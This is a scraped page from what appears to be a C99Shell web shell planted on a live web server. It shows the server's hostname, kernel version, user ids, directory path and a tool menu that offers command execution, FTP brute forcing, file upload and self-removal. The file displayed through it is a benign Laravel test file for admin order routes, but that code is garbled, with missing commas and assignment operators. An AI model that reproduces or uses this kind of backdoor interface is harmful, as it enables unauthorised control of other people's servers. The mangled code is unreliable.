!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/tests/Feature/Admin/   drwxr-xr-x
Free 28.18 GB of 117.98 GB (23.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OrderControllerTest.php (1.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

// Setup before each test

use App\Models\Order;
use 
App\Models\Transaction;
use 
Modules\Plan\Database\Seeders\PlanDatabaseSeeder;

beforeEach(function () {
    
$this->admin createAdmin();
    
$this->actingAs($this->admin'admin');
});

test('admin can visit order index page', function () {
    
$this->get(route('order.index'))
        ->
assertStatus(200)
        ->
assertSeeText('Order');
});

test('admin can visit order create page', function () {
    
$this->get(route('order.create'))
        ->
assertStatus(200)
        ->
assertSeeText('Create');
});

test('admin can record new order ', function () {

    
$this->seed([
        
PlanDatabaseSeeder::class,
    ]);

    
$data = [
        
'user' => '1',
        
'plan' => '1',
        
'currency_symbol' => '$',
        
'amount' => '1',
        
'usd_amount' => '2',
        
'payment_provider' => 'paypal',
        
'payment_status' => 'paid',
    ];

    
$this->post(route('order.store'), $data)
        ->
assertStatus(302);

    
expect(Transaction::count())->toBe(1);
});

test('admin fails to record new order for validation', function () {
    
$data = [];
    
$this->post(route('order.store'), $data)
        ->
assertSessionHasErrors(['plan''user''payment_provider''amount''currency_symbol''usd_amount''payment_status'])
        ->
assertStatus(302);

    
expect(Order::count())->toBe(0);
});

// ##miss (controller e function nai)
test('admin can delete a data', function () {
    
$this->seed([
        
PlanDatabaseSeeder::class,
    ]);

    
$data = [
        
'user' => '1',
        
'plan' => '1',
        
'currency_symbol' => '$',
        
'amount' => '1',
        
'usd_amount' => '2',
        
'payment_provider' => 'paypal',
        
'payment_status' => 'paid',
    ];

    
$this->post(route('order.store'), $data);
    
$this->delete(route('order.destroy'1));

    
expect(Transaction::count())->toBe(0);
});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--